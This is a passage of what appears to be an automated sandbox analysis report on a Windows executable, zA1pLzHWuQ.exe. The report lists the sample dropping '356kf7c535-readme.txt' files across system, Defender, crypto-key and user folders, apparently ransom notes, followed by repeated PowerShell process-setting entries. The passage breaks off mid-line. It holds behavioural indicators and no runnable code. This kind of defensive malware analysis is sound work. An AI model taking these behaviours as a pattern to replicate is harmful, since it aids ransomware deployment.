        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender advanced threat protection\trace\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msscan\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows security health\health advisor\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows security health\logs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\winmsipc\server\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wwansvc\dmprofiles\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\wwansvc\profiles\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\oracle\java\installcache\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1002\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1003\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\curqnkvoix\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\fenivhoikn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\ipkgelntqy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\jsdngycowy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\kzwfnrxyki\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\desktop\mxpxcvpdvn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\20200719\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\curqnkvoix\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\fenivhoikn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\ipkgelntqy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\jsdngycowy\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\kzwfnrxyki\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\documents\mxpxcvpdvn\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\users\user\favorites\links\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\s\18392\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\adobe\arm\s\20227\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\catalog\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\integration\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\dss\machinekeys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\pcpksp\windowsaik\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\rsa\machinekeys\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\crypto\rsa\s-1-5-18\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\device\{8702d817-5aad-4674-9ef3-4d3decd87120}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\autologger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\scenarioshutdownlogger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\etllogs\shutdownlogger\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\diagnosis\tenantstorage\p-aria\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\event viewer\views\applicationviewsrootnode\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\identitycrl\production\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\assetcache\cellularux\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\prov\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\applications\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\search\data\temp\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\speech_onecore\sr\sv10-ev100\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\backup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\default\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\nisbackup\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\updates\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\definition updates\{f76193f4-804d-487e-84b3-ef6fc382142d}\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\network inspection system\support\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\platform\4.18.1806.18062-0\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\backupstore\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\history\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\rtsigs\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows defender\scans\scans\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\activitylog\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\common coverpages\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\inbox\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\queue\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\sentitems\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\windows nt\msfax\virtualinbox\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1002\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\s-1-5-21-58933367-3072710494-194312298-1003\systemappdata\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\catalog\packages\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\machinedata\integration\shortcutbackups\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\en-us.16\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\clicktorun\productreleases\a605f2a5-9d01-4691-9fdc-be6391d70203\x-none.16\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-us\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\device stage\task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-us\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: c:\programdata\microsoft\provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\prov\runtime\356kf7c535-readme.txtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\Win